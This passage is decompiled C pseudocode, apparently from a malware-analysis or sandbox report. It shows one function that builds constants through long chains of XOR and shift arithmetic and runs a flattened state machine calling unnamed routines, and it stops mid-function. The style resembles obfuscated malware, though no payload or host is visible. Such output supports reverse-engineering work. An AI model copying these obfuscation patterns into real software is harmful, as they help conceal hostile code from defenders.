                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				unsigned int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				void* _t878;
                                                                                                                      				intOrPtr _t883;
                                                                                                                      				intOrPtr _t885;
                                                                                                                      				void* _t887;
                                                                                                                      				void* _t891;
                                                                                                                      				void* _t897;
                                                                                                                      				intOrPtr _t905;
                                                                                                                      				intOrPtr _t911;
                                                                                                                      				intOrPtr _t912;
                                                                                                                      				void* _t913;
                                                                                                                      				signed int _t915;
                                                                                                                      				char _t918;
                                                                                                                      				void* _t927;
                                                                                                                      				signed int _t933;
                                                                                                                      				signed int _t934;
                                                                                                                      				signed int _t935;
                                                                                                                      				signed int _t936;
                                                                                                                      				signed int _t937;
                                                                                                                      				signed int _t938;
                                                                                                                      				signed int _t939;
                                                                                                                      				signed int _t940;
                                                                                                                      				signed int _t941;
                                                                                                                      				signed int _t942;
                                                                                                                      				signed int _t943;
                                                                                                                      				signed int _t944;
                                                                                                                      				signed int _t945;
                                                                                                                      				signed int _t946;
                                                                                                                      				signed int _t947;
                                                                                                                      				signed int _t948;
                                                                                                                      				signed int _t949;
                                                                                                                      				void* _t950;
                                                                                                                      				intOrPtr _t967;
                                                                                                                      				intOrPtr _t971;
                                                                                                                      				void* _t1030;
                                                                                                                      				intOrPtr _t1032;
                                                                                                                      				intOrPtr _t1036;
                                                                                                                      				signed int _t1052;
                                                                                                                      				void* _t1053;
                                                                                                                      				intOrPtr _t1055;
                                                                                                                      				signed int _t1056;
                                                                                                                      				signed int _t1057;
                                                                                                                      				void* _t1058;
                                                                                                                      				void* _t1063;
                                                                                                                      				signed int* _t1065;
                                                                                                                      				void* _t1070;
                                                                                                                      
                                                                                                                      				_t1065 =  &_v428;
                                                                                                                      				_v368 = 0xff2aef;
                                                                                                                      				_v368 = _v368 ^ 0x94d7aa8a;
                                                                                                                      				_v72 = __ecx;
                                                                                                                      				_t1063 = 0;
                                                                                                                      				_t933 = 0x71;
                                                                                                                      				_v368 = _v368 / _t933;
                                                                                                                      				_v368 = _v368 >> 0x10;
                                                                                                                      				_t927 = 0xe23336a;
                                                                                                                      				_v368 = _v368 ^ 0x4d424504;
                                                                                                                      				_v360 = 0xd1872;
                                                                                                                      				_v360 = _v360 >> 1;
                                                                                                                      				_v360 = _v360 ^ 0xf196af6a;
                                                                                                                      				_v360 = _v360 >> 2;
                                                                                                                      				_v360 = _v360 ^ 0x3c6408d5;
                                                                                                                      				_v176 = 0xb206d0;
                                                                                                                      				_t934 = 0x55;
                                                                                                                      				_v176 = _v176 * 0x7f;
                                                                                                                      				_v176 = _v176 ^ 0x58516130;
                                                                                                                      				_v128 = 0x74c3bb;
                                                                                                                      				_v128 = _v128 ^ 0x08cc5173;
                                                                                                                      				_v128 = _v128 ^ 0x08b892c8;
                                                                                                                      				_v324 = 0x9db377;
                                                                                                                      				_t935 = 0x54;
                                                                                                                      				_v324 = _v324 / _t934;
                                                                                                                      				_v324 = _v324 >> 9;
                                                                                                                      				_v324 = _v324 ^ 0x000000ed;
                                                                                                                      				_v112 = 0x5e8d48;
                                                                                                                      				_v112 = _v112 / _t935;
                                                                                                                      				_v112 = _v112 ^ 0x00012028;
                                                                                                                      				_v224 = 0x5fd119;
                                                                                                                      				_v224 = _v224 | 0x5d78ffc1;
                                                                                                                      				_v224 = _v224 ^ 0x83601dcb;
                                                                                                                      				_v224 = _v224 ^ 0xde1fe212;
                                                                                                                      				_v284 = 0x3ef093;
                                                                                                                      				_t1056 = 0x2f;
                                                                                                                      				_v284 = _v284 * 0x78;
                                                                                                                      				_v284 = _v284 ^ 0x8f55145b;
                                                                                                                      				_v284 = _v284 ^ 0x92d5d0b3;
                                                                                                                      				_v384 = 0xed432;
                                                                                                                      				_v384 = _v384 << 5;
                                                                                                                      				_v384 = _v384 | 0x363f046e;
                                                                                                                      				_v384 = _v384 + 0xffff62d1;
                                                                                                                      				_v384 = _v384 ^ 0x37fee93f;
                                                                                                                      				_v140 = 0x433cbb;
                                                                                                                      				_v140 = _v140 + 0xffffaad9;
                                                                                                                      				_v140 = _v140 ^ 0x0042e794;
                                                                                                                      				_v336 = 0xcb983b;
                                                                                                                      				_v336 = _v336 >> 1;
                                                                                                                      				_v336 = _v336 << 4;
                                                                                                                      				_v336 = _v336 | 0x18349d49;
                                                                                                                      				_v336 = _v336 ^ 0x1e7cddd9;
                                                                                                                      				_v116 = 0xdf1b2;
                                                                                                                      				_v116 = _v116 | 0x5d84461c;
                                                                                                                      				_v116 = _v116 ^ 0x5d8df7be;
                                                                                                                      				_v352 = 0x1a6928;
                                                                                                                      				_v352 = _v352 + 0xb4e6;
                                                                                                                      				_v352 = _v352 + 0xd244;
                                                                                                                      				_v352 = _v352 + 0xffffe4cf;
                                                                                                                      				_v352 = _v352 ^ 0x001bd501;
                                                                                                                      				_v216 = 0x4eea53;
                                                                                                                      				_v216 = _v216 / _t1056;
                                                                                                                      				_v216 = _v216 + 0xffff2d58;
                                                                                                                      				_v216 = _v216 ^ 0x000cf508;
                                                                                                                      				_v136 = 0xd4127c;
                                                                                                                      				_t936 = 0xd;
                                                                                                                      				_v136 = _v136 * 0x71;
                                                                                                                      				_v136 = _v136 ^ 0x5d98049d;
                                                                                                                      				_v84 = 0x5dec0;
                                                                                                                      				_v84 = _v84 + 0xffff1ffb;
                                                                                                                      				_v84 = _v84 ^ 0x00030d01;
                                                                                                                      				_v144 = 0x51c367;
                                                                                                                      				_v144 = _v144 | 0x0242a62f;
                                                                                                                      				_v144 = _v144 ^ 0x025bd945;
                                                                                                                      				_v232 = 0x88ff65;
                                                                                                                      				_v232 = _v232 >> 3;
                                                                                                                      				_v232 = _v232 ^ 0xa25d5547;
                                                                                                                      				_v232 = _v232 ^ 0xa24a7ec6;
                                                                                                                      				_v272 = 0xc81b6f;
                                                                                                                      				_v272 = _v272 | 0x487ad3f8;
                                                                                                                      				_v272 = _v272 ^ 0xba29c57d;
                                                                                                                      				_v272 = _v272 ^ 0xf2d9b36a;
                                                                                                                      				_v348 = 0xc83c7a;
                                                                                                                      				_v348 = _v348 ^ 0xff1a377f;
                                                                                                                      				_v348 = _v348 << 6;
                                                                                                                      				_v348 = _v348 ^ 0x4baa6a66;
                                                                                                                      				_v348 = _v348 ^ 0xbf2398db;
                                                                                                                      				_v388 = 0x1aaad9;
                                                                                                                      				_v388 = _v388 >> 0xf;
                                                                                                                      				_v388 = _v388 * 0x2b;
                                                                                                                      				_v388 = _v388 | 0xe773ca21;
                                                                                                                      				_v388 = _v388 ^ 0xe773499c;
                                                                                                                      				_v200 = 0x8f1511;
                                                                                                                      				_v200 = _v200 + 0x4dd0;
                                                                                                                      				_v200 = _v200 ^ 0xe54041ed;
                                                                                                                      				_v200 = _v200 ^ 0xe5c111e7;
                                                                                                                      				_v264 = 0x8d8e04;
                                                                                                                      				_v264 = _v264 / _t936;
                                                                                                                      				_t937 = 0x4c;
                                                                                                                      				_v264 = _v264 * 0x55;
                                                                                                                      				_v264 = _v264 ^ 0x039811bf;
                                                                                                                      				_v96 = 0xdcd85e;
                                                                                                                      				_v96 = _v96 / _t937;
                                                                                                                      				_v96 = _v96 ^ 0x000f7a5c;
                                                                                                                      				_v428 = 0x18f383;
                                                                                                                      				_v428 = _v428 + 0xffff3777;
                                                                                                                      				_v428 = _v428 >> 1;
                                                                                                                      				_v428 = _v428 + 0xf3dd;
                                                                                                                      				_v428 = _v428 ^ 0x000e7633;
                                                                                                                      				_v188 = 0x34b02;
                                                                                                                      				_v188 = _v188 ^ 0xe768d075;
                                                                                                                      				_v188 = _v188 ^ 0xe766fcd1;
                                                                                                                      				_v88 = 0xb2b6ec;
                                                                                                                      				_v88 = _v88 | 0xb32e283a;
                                                                                                                      				_v88 = _v88 ^ 0xb3b69210;
                                                                                                                      				_v424 = 0x403e2a;
                                                                                                                      				_v424 = _v424 ^ 0x11634d1e;
                                                                                                                      				_v424 = _v424 | 0x9df6a7b5;
                                                                                                                      				_v424 = _v424 >> 2;
                                                                                                                      				_v424 = _v424 ^ 0x2776b69a;
                                                                                                                      				_v180 = 0x23f4a5;
                                                                                                                      				_v180 = _v180 << 7;
                                                                                                                      				_v180 = _v180 ^ 0x11fd1649;
                                                                                                                      				_v316 = 0xb84933;
                                                                                                                      				_v316 = _v316 | 0x4a16bd06;
                                                                                                                      				_v316 = _v316 << 1;
                                                                                                                      				_v316 = _v316 ^ 0x95764bca;
                                                                                                                      				_v420 = 0xe425a2;
                                                                                                                      				_v420 = _v420 << 7;
                                                                                                                      				_v420 = _v420 << 1;
                                                                                                                      				_v420 = _v420 >> 6;
                                                                                                                      				_v420 = _v420 ^ 0x039eaa37;
                                                                                                                      				_v292 = 0x9acd8a;
                                                                                                                      				_v292 = _v292 ^ 0x0e2fa243;
                                                                                                                      				_t1052 = 0x17;
                                                                                                                      				_v292 = _v292 / _t1052;
                                                                                                                      				_v292 = _v292 ^ 0x00a605f7;
                                                                                                                      				_v380 = 0x2df23b;
                                                                                                                      				_t938 = 0x6d;
                                                                                                                      				_v380 = _v380 * 0x74;
                                                                                                                      				_v380 = _v380 >> 0xc;
                                                                                                                      				_v380 = _v380 / _t938;
                                                                                                                      				_v380 = _v380 ^ 0x0002d8a7;
                                                                                                                      				_v192 = 0x38a983;
                                                                                                                      				_v192 = _v192 ^ 0x7338200d;
                                                                                                                      				_v192 = _v192 ^ 0x730638fe;
                                                                                                                      				_v356 = 0xf20a05;
                                                                                                                      				_v356 = _v356 + 0xff6b;
                                                                                                                      				_v356 = _v356 + 0x3cb0;
                                                                                                                      				_v356 = _v356 + 0xc3cc;
                                                                                                                      				_v356 = _v356 ^ 0x00f609fa;
                                                                                                                      				_v196 = 0x1d0726;
                                                                                                                      				_t939 = 0x1a;
                                                                                                                      				_v196 = _v196 / _t939;
                                                                                                                      				_v196 = _v196 + 0xb645;
                                                                                                                      				_v196 = _v196 ^ 0x000fece0;
                                                                                                                      				_v120 = 0xd811b7;
                                                                                                                      				_t940 = 0x3d;
                                                                                                                      				_v120 = _v120 / _t940;
                                                                                                                      				_v120 = _v120 ^ 0x0001bcc6;
                                                                                                                      				_v184 = 0xffd473;
                                                                                                                      				_v184 = _v184 | 0x4373bb07;
                                                                                                                      				_v184 = _v184 ^ 0x43f83aa1;
                                                                                                                      				_v372 = 0x3a762e;
                                                                                                                      				_v372 = _v372 + 0x1c4d;
                                                                                                                      				_t941 = 0x56;
                                                                                                                      				_v372 = _v372 * 0x6d;
                                                                                                                      				_v372 = _v372 << 4;
                                                                                                                      				_v372 = _v372 ^ 0x8f067f53;
                                                                                                                      				_v168 = 0xcae3b4;
                                                                                                                      				_v168 = _v168 | 0xbfa03ec2;
                                                                                                                      				_v168 = _v168 ^ 0xbfe1c53a;
                                                                                                                      				_v100 = 0xf6f3e0;
                                                                                                                      				_v100 = _v100 >> 3;
                                                                                                                      				_v100 = _v100 ^ 0x0013143a;
                                                                                                                      				_v412 = 0x1e0966;
                                                                                                                      				_v412 = _v412 >> 4;
                                                                                                                      				_v412 = _v412 + 0xffffee60;
                                                                                                                      				_v412 = _v412 | 0x230cd4d2;
                                                                                                                      				_v412 = _v412 ^ 0x230304c3;
                                                                                                                      				_v404 = 0x998131;
                                                                                                                      				_v404 = _v404 << 7;
                                                                                                                      				_v404 = _v404 | 0x77ffce0e;
                                                                                                                      				_v404 = _v404 ^ 0x7ff99efa;
                                                                                                                      				_v312 = 0x568591;
                                                                                                                      				_v312 = _v312 >> 0xf;
                                                                                                                      				_v312 = _v312 / _t941;
                                                                                                                      				_v312 = _v312 ^ 0x000b9c1e;
                                                                                                                      				_v160 = 0xbcadf8;
                                                                                                                      				_v160 = _v160 >> 1;
                                                                                                                      				_v160 = _v160 ^ 0x00564666;
                                                                                                                      				_v256 = 0x89dc62;
                                                                                                                      				_v256 = _v256 + 0xffff4163;
                                                                                                                      				_t942 = 0x31;
                                                                                                                      				_v256 = _v256 / _t942;
                                                                                                                      				_v256 = _v256 ^ 0x000723b0;
                                                                                                                      				_v320 = 0x8b7373;
                                                                                                                      				_v320 = _v320 ^ 0x53082765;
                                                                                                                      				_v320 = _v320 + 0xffaf;
                                                                                                                      				_v320 = _v320 ^ 0x53885e4a;
                                                                                                                      				_v92 = 0x6fe7c3;
                                                                                                                      				_v92 = _v92 / _t1056;
                                                                                                                      				_v92 = _v92 ^ 0x00052277;
                                                                                                                      				_v304 = 0xc66521;
                                                                                                                      				_v304 = _v304 + 0xffff290f;
                                                                                                                      				_v304 = _v304 + 0xffff5c28;
                                                                                                                      				_v304 = _v304 ^ 0x00cc2568;
                                                                                                                      				_v340 = 0x1cea4a;
                                                                                                                      				_v340 = _v340 >> 0xc;
                                                                                                                      				_t943 = 0x23;
                                                                                                                      				_v340 = _v340 * 0x60;
                                                                                                                      				_v340 = _v340 ^ 0x014bf5b0;
                                                                                                                      				_v340 = _v340 ^ 0x014272a9;
                                                                                                                      				_v152 = 0xc6e163;
                                                                                                                      				_v152 = _v152 + 0x3602;
                                                                                                                      				_v152 = _v152 ^ 0x00cdf824;
                                                                                                                      				_v296 = 0x3aa8f0;
                                                                                                                      				_v296 = _v296 + 0xffff263e;
                                                                                                                      				_v296 = _v296 / _t943;
                                                                                                                      				_v296 = _v296 ^ 0x0003475b;
                                                                                                                      				_v248 = 0xb8b108;
                                                                                                                      				_v248 = _v248 + 0xab20;
                                                                                                                      				_t944 = 0x75;
                                                                                                                      				_v248 = _v248 / _t944;
                                                                                                                      				_v248 = _v248 ^ 0x00035626;
                                                                                                                      				_v300 = 0xbacf;
                                                                                                                      				_v300 = _v300 >> 5;
                                                                                                                      				_v300 = _v300 / _t1052;
                                                                                                                      				_v300 = _v300 ^ 0x000b4ef1;
                                                                                                                      				_v172 = 0xfe2c89;
                                                                                                                      				_v172 = _v172 * 0x65;
                                                                                                                      				_v172 = _v172 ^ 0x6444a0c5;
                                                                                                                      				_v416 = 0xe4629;
                                                                                                                      				_v416 = _v416 << 1;
                                                                                                                      				_v416 = _v416 >> 0xf;
                                                                                                                      				_v416 = _v416 >> 8;
                                                                                                                      				_v416 = _v416 ^ 0x000284ee;
                                                                                                                      				_v308 = 0x20a4b4;
                                                                                                                      				_v308 = _v308 | 0x84e389a9;
                                                                                                                      				_v308 = _v308 * 0x13;
                                                                                                                      				_v308 = _v308 ^ 0xdce9fc24;
                                                                                                                      				_v276 = 0x7369a;
                                                                                                                      				_v276 = _v276 * 0x43;
                                                                                                                      				_v276 = _v276 << 9;
                                                                                                                      				_v276 = _v276 ^ 0xc69e4921;
                                                                                                                      				_v392 = 0xdfb120;
                                                                                                                      				_t1057 = 0x30;
                                                                                                                      				_v392 = _v392 / _t1057;
                                                                                                                      				_v392 = _v392 | 0xaf971ec4;
                                                                                                                      				_v392 = _v392 + 0xad3b;
                                                                                                                      				_v392 = _v392 ^ 0xaf95a150;
                                                                                                                      				_v400 = 0xf5e732;
                                                                                                                      				_v400 = _v400 << 0xd;
                                                                                                                      				_v400 = _v400 ^ 0x49123968;
                                                                                                                      				_v400 = _v400 << 0xa;
                                                                                                                      				_v400 = _v400 ^ 0xd1e13951;
                                                                                                                      				_v408 = 0xd34aa1;
                                                                                                                      				_v408 = _v408 | 0x4ccc3e1e;
                                                                                                                      				_t945 = 0x64;
                                                                                                                      				_v408 = _v408 * 0x42;
                                                                                                                      				_v408 = _v408 / _t945;
                                                                                                                      				_v408 = _v408 ^ 0x02168dd3;
                                                                                                                      				_v332 = 0xf683c0;
                                                                                                                      				_v332 = _v332 / _t1052;
                                                                                                                      				_v332 = _v332 >> 0xe;
                                                                                                                      				_v332 = _v332 ^ 0x000613e8;
                                                                                                                      				_v260 = 0x3cc9c3;
                                                                                                                      				_v260 = _v260 + 0xa75b;
                                                                                                                      				_t946 = 0x61;
                                                                                                                      				_v260 = _v260 * 0x22;
                                                                                                                      				_v260 = _v260 ^ 0x082f3be2;
                                                                                                                      				_v268 = 0x4bcd23;
                                                                                                                      				_v268 = _v268 << 0xa;
                                                                                                                      				_v268 = _v268 >> 0xe;
                                                                                                                      				_v268 = _v268 ^ 0x0006002f;
                                                                                                                      				_v376 = 0x8e25da;
                                                                                                                      				_v376 = _v376 ^ 0x089338b1;
                                                                                                                      				_v376 = _v376 + 0x9f1e;
                                                                                                                      				_v376 = _v376 * 0x3e;
                                                                                                                      				_v376 = _v376 ^ 0xf734e37c;
                                                                                                                      				_v288 = 0x2c1a1a;
                                                                                                                      				_v288 = _v288 >> 1;
                                                                                                                      				_v288 = _v288 + 0x65f9;
                                                                                                                      				_v288 = _v288 ^ 0x001f182d;
                                                                                                                      				_v396 = 0x261c11;
                                                                                                                      				_v396 = _v396 * 0x4a;
                                                                                                                      				_v396 = _v396 + 0xfc66;
                                                                                                                      				_v396 = _v396 / _t1057;
                                                                                                                      				_v396 = _v396 ^ 0x003f9cf3;
                                                                                                                      				_v208 = 0x249f02;
                                                                                                                      				_v208 = _v208 * 0x35;
                                                                                                                      				_v208 = _v208 | 0x0bd65ece;
                                                                                                                      				_v208 = _v208 ^ 0x0fd6fbcb;
                                                                                                                      				_v236 = 0xa548a3;
                                                                                                                      				_v236 = _v236 ^ 0x6a8a42f2;
                                                                                                                      				_v236 = _v236 | 0x2dc08498;
                                                                                                                      				_v236 = _v236 ^ 0x6fec3552;
                                                                                                                      				_v244 = 0x5b801b;
                                                                                                                      				_v244 = _v244 >> 0x10;
                                                                                                                      				_v244 = _v244 / _t946;
                                                                                                                      				_v244 = _v244 ^ 0x0007501f;
                                                                                                                      				_v164 = 0x4d0087;
                                                                                                                      				_v164 = _v164 | 0x435fc395;
                                                                                                                      				_v164 = _v164 ^ 0x4354d65b;
                                                                                                                      				_v252 = 0x449e75;
                                                                                                                      				_v252 = _v252 | 0x5d5fe7f7;
                                                                                                                      				_v252 = _v252 ^ 0x5d579835;
                                                                                                                      				_v344 = 0x288ce5;
                                                                                                                      				_t1053 = 0xf59c021;
                                                                                                                      				_v344 = _v344 + 0xb994;
                                                                                                                      				_t1058 = 0xa6cb997;
                                                                                                                      				_v344 = _v344 + 0xffff4f41;
                                                                                                                      				_t947 = 0x7b;
                                                                                                                      				_v344 = _v344 * 0x4e;
                                                                                                                      				_v344 = _v344 ^ 0x0c50f765;
                                                                                                                      				_v212 = 0x44a004;
                                                                                                                      				_v212 = _v212 / _t947;
                                                                                                                      				_v212 = _v212 | 0x4d1b1380;
                                                                                                                      				_v212 = _v212 ^ 0x4d12f735;
                                                                                                                      				_v148 = 0xb7f79c;
                                                                                                                      				_v148 = _v148 | 0x3407a1ee;
                                                                                                                      				_v148 = _v148 ^ 0x34b718ff;
                                                                                                                      				_v220 = 0xe82bd0;
                                                                                                                      				_v220 = _v220 ^ 0xc89b583b;
                                                                                                                      				_t948 = 0x12;
                                                                                                                      				_v220 = _v220 / _t948;
                                                                                                                      				_v220 = _v220 ^ 0x0b283f5f;
                                                                                                                      				_v156 = 0x5af0c5;
                                                                                                                      				_v156 = _v156 + 0x13dc;
                                                                                                                      				_v156 = _v156 ^ 0x00588292;
                                                                                                                      				_v228 = 0xdd0fc1;
                                                                                                                      				_v228 = _v228 ^ 0x01435610;
                                                                                                                      				_t949 = 0x1f;
                                                                                                                      				_v228 = _v228 * 0x7e;
                                                                                                                      				_v228 = _v228 ^ 0xcbf716b5;
                                                                                                                      				_v124 = 0xd80e40;
                                                                                                                      				_v124 = _v124 ^ 0x653de0e6;
                                                                                                                      				_v124 = _v124 ^ 0x65e35353;
                                                                                                                      				_v132 = 0x5632b9;
                                                                                                                      				_v132 = _v132 + 0xffff4616;
                                                                                                                      				_v132 = _v132 ^ 0x0058fa24;
                                                                                                                      				_v204 = 0xa86aea;
                                                                                                                      				_v204 = _v204 ^ 0x5463a324;
                                                                                                                      				_v204 = _v204 + 0xffff5f95;
                                                                                                                      				_v204 = _v204 ^ 0x54cedf8e;
                                                                                                                      				_v364 = 0xe8e823;
                                                                                                                      				_v364 = _v364 + 0xffffb955;
                                                                                                                      				_v364 = _v364 + 0xffffe3ba;
                                                                                                                      				_v364 = _v364 ^ 0x9235047b;
                                                                                                                      				_v364 = _v364 ^ 0x92d6764f;
                                                                                                                      				_v280 = 0xb242c7;
                                                                                                                      				_v280 = _v280 + 0xd280;
                                                                                                                      				_v280 = _v280 | 0xe772c78b;
                                                                                                                      				_v280 = _v280 ^ 0xe7f56f66;
                                                                                                                      				_v240 = 0xa7072;
                                                                                                                      				_v240 = _v240 + 0x191d;
                                                                                                                      				_v240 = _v240 ^ 0x431e7c4c;
                                                                                                                      				_v240 = _v240 ^ 0x431912b5;
                                                                                                                      				_v104 = 0x3f68c3;
                                                                                                                      				_v104 = _v104 << 1;
                                                                                                                      				_v104 = _v104 ^ 0x00784a5e;
                                                                                                                      				_v108 = 0xb2f51d;
                                                                                                                      				_v108 = _v108 ^ 0x0119eef7;
                                                                                                                      				_v108 = _v108 ^ 0x01a6bc10;
                                                                                                                      				_v328 = 0xc750f0;
                                                                                                                      				_v328 = _v328 / _t949;
                                                                                                                      				_v328 = _v328 + 0x3c71;
                                                                                                                      				_v328 = _v328 ^ 0x000854e6;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t1030 = 0x5edbe80;
                                                                                                                      					_t950 = 0x530629d;
                                                                                                                      					_t878 = 0x9627218;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t1070 = _t927 - _t878;
                                                                                                                      							if(_t1070 <= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags = _t927 - _t1058;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_push(_v252);
                                                                                                                      								_push(_v164);
                                                                                                                      								_push(0x2b1648);
                                                                                                                      								_t1059 = E002BAB66(_v236, _v244, __eflags);
                                                                                                                      								_v44 = _v368;
                                                                                                                      								_v40 = _v360;
                                                                                                                      								_v36 = _v352;
                                                                                                                      								_t883 =  *0x2d5c9c; // 0x0
                                                                                                                      								_t885 =  *0x2d5c9c; // 0x0
                                                                                                                      								_t1032 =  *0x2d5c9c; // 0x0
                                                                                                                      								_t887 = E002C4016(_v344,  *((intOrPtr*)(_t1032 + 0x5c)), _v236, _v80, _t879, _v212, _v140, _v148, _v220, _t885 + 0x50, _v236,  &_v44, _v156,  *((intOrPtr*)(_t883 + 0x58)), _v228);
                                                                                                                      								_t1065 =  &(_t1065[0x10]);
                                                                                                                      								__eflags = _t887 - _v336;
                                                                                                                      								if(_t887 != _v336) {
                                                                                                                      									_t927 = 0x1936859;
                                                                                                                      								} else {
                                                                                                                      									_t927 = _t1053;
                                                                                                                      									_t1063 = 1;
                                                                                                                      								}
                                                                                                                      								E002BAE03(_v124, _v132, _v204, _t1059);
                                                                                                                      								L24:
                                                                                                                      								_t1030 = 0x5edbe80;
                                                                                                                      								_t950 = 0x530629d;
                                                                                                                      								_t1058 = 0xa6cb997;
                                                                                                                      								_t878 = 0x9627218;
                                                                                                                      								goto L25;
                                                                                                                      							}
                                                                                                                      							__eflags = _t927 - 0xe23336a;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t927 = 0x66c3b1;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t927 - _t1053;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L25;
                                                                                                                      							}
                                                                                                                      							E002B7027(_v108, _v116, _v80, _v328);
                                                                                                                      							L18:
                                                                                                                      							return _t1063;
                                                                                                                      						}
                                                                                                                      						if(_t1070 == 0) {
                                                                                                                      							_push(_v308);
                                                                                                                      							_push(_v416);
                                                                                                                      							_push(0x2b1518);
                                                                                                                      							_t891 = E002BAB66(_v300, _v172, __eflags);
                                                                                                                      							_t1036 =  *0x2d5c9c; // 0x0
                                                                                                                      							__eflags = E002CFBCF(_v276, _t1036 + 0x5c, _v80, _v392, _v400, _v408, _t891, _v284, _v332, _v300,  &_v76) - _v384;
                                                                                                                      							_t927 =  ==  ? 0x530629d : _t1053;
                                                                                                                      							E002BAE03(_v260, _v268, _v376, _t891);
                                                                                                                      							_t1065 =  &(_t1065[0xe]);
                                                                                                                      							goto L24;
                                                                                                                      						}
                                                                                                                      						if(_t927 == 0x66c3b1) {
                                                                                                                      							_push(_v144);
                                                                                                                      							_push(_v84);
                                                                                                                      							_push(0x2b15c8);
                                                                                                                      							_t897 = E002BAB66(_v216, _v136, __eflags);
                                                                                                                      							_push(_v388);
                                                                                                                      							_push(_v348);
                                                                                                                      							_push(0x2b1538);
                                                                                                                      							__eflags = E002C0EDA(E002BAB66(_v232, _v272, __eflags), _v128, _v200, _t897,  &_v80, _v264, _v96) - _v324;
                                                                                                                      							_t927 =  ==  ? 0x5edbe80 : 0x7114309;
                                                                                                                      							E002BAE03(_v428, _v188, _v88, _t897);
                                                                                                                      							E002BAE03(_v424, _v180, _v316, _t898);
                                                                                                                      							_t1065 =  &(_t1065[0xf]);
                                                                                                                      							L9:
                                                                                                                      							_t1053 = 0xf59c021;
                                                                                                                      							goto L24;
                                                                                                                      						}
                                                                                                                      						if(_t927 == 0x1936859) {
                                                                                                                      							_t905 =  *0x2d5c9c; // 0x0
                                                                                                                      							E002B68DE(_v364, _v280, _v240, _v104,  *((intOrPtr*)(_t905 + 0x58)));
                                                                                                                      							_t1065 =  &(_t1065[3]);
                                                                                                                      							_t927 = _t1053;
                                                                                                                      							while(1) {
                                                                                                                      								L1:
                                                                                                                      								_t1030 = 0x5edbe80;
                                                                                                                      								_t950 = 0x530629d;
                                                                                                                      								_t878 = 0x9627218;
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t927 == _t950) {
                                                                                                                      							_push(_t950);
                                                                                                                      							_push(_t950);
                                                                                                                      							_t967 =  *0x2d5c9c; // 0x0
                                                                                                                      							_t971 = E002C3512( *((intOrPtr*)(_t967 + 0x5c)));
                                                                                                                      							_t911 =  *0x2d5c9c; // 0x0
                                                                                                                      							__eflags = _t971;
                                                                                                                      							_t927 =  !=  ? _t1058 : _t1053;
                                                                                                                      							 *((intOrPtr*)(_t911 + 0x58)) = _t971;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						_t1074 = _t927 - _t1030;
                                                                                                                      						if(_t927 != _t1030) {
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						_push(_v192);
                                                                                                                      						_push(_v380);
                                                                                                                      						_push(0x2b1568);
                                                                                                                      						_t912 = E002BAB66(_v420, _v292, _t1074);
                                                                                                                      						_push(_v184);
                                                                                                                      						_t1055 = _t912;
                                                                                                                      						_t700 =  &_v120; // 0x784a5e
                                                                                                                      						_push( *_t700);
                                                                                                                      						_push(0x2b1618);
                                                                                                                      						_t913 = E002BAB66(_v356, _v196, _t1074);
                                                                                                                      						_v64 = _v176;
                                                                                                                      						_t915 = E002CBA68(_v372, _v168, _v100, _t1055, _v412);
